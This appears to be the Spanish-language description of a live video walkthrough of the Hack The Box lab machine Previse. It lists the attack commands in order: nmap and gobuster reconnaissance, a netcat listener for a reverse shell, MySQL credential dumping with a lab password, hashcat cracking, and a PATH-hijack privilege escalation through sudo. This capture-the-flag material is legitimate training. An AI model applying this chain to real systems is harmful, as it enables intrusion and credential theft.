Hackerñol CTF Demostraciones - Hack The Box - Previse - [EN VIVO][Spoilers]
Hackerñol Para Hackers en Español
Hackerñol CTF Demostraciones - Hack The Box - Previse - [EN VIVO][Spoilers] comandos abajo:
Esto es una prueba live, vamos a ver, se perdió mucho el tiempo instalando zaproxy y otras cosas, no tengo google-chrome y la version de firefox no va con zaproxy quiere una mas vieja y se me olvido quitar el firewall por lo que el revshell tardo hasta que me di cuenta :D también perdimos el tiempo en otras cositas, pero siempre podéis tirar para adelante el video Es muy fácil, no hace falta que ponga notas solo los comandos por encima:
Escanear puertos
nmap -sC -sV -oN nmap 10.10.11.104
buscar directorios y ficheros
gobuster dir -u http://previse/ -w ~/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o boguster -x php
Inspeccionar .php remotos
curl http://10.10.11.104/accounts.php
empezar servidor de web local
python3 -m http.server 9090
escuchar por conexión tcp localmente
nc -nlvp 6667
Mirar la lista de tablas de la base de datos previse
mysql -u root -p'mySQL_p@ssw0rd!:)' -D previse -e 'show tables;'
Mirar todas las cuentas y sus credenciales que salen cifradas
mysql -u root -p'mySQL_p@ssw0rd!:)' -D previse -e 'select * from accounts;'
romper cifrado por medio de diccionario
hashcat -m 500 hash /home/rek2/Sync/hackthebox/Previse-10.10.11.104/rockyou.txt
que comandos puede el usuario correr como root con sudo
sudo -l
aprovecharse del bash script que no tiene full path para gzip
Poner el path /tmp en el PATH tuyo para que mire hay primero por gzip
export PATH=/tmp/:$PATH
El libro de hashcrack es la version 3 muy recomendado como vistes me ahorro mucho tiempo.
2613673134 Bytes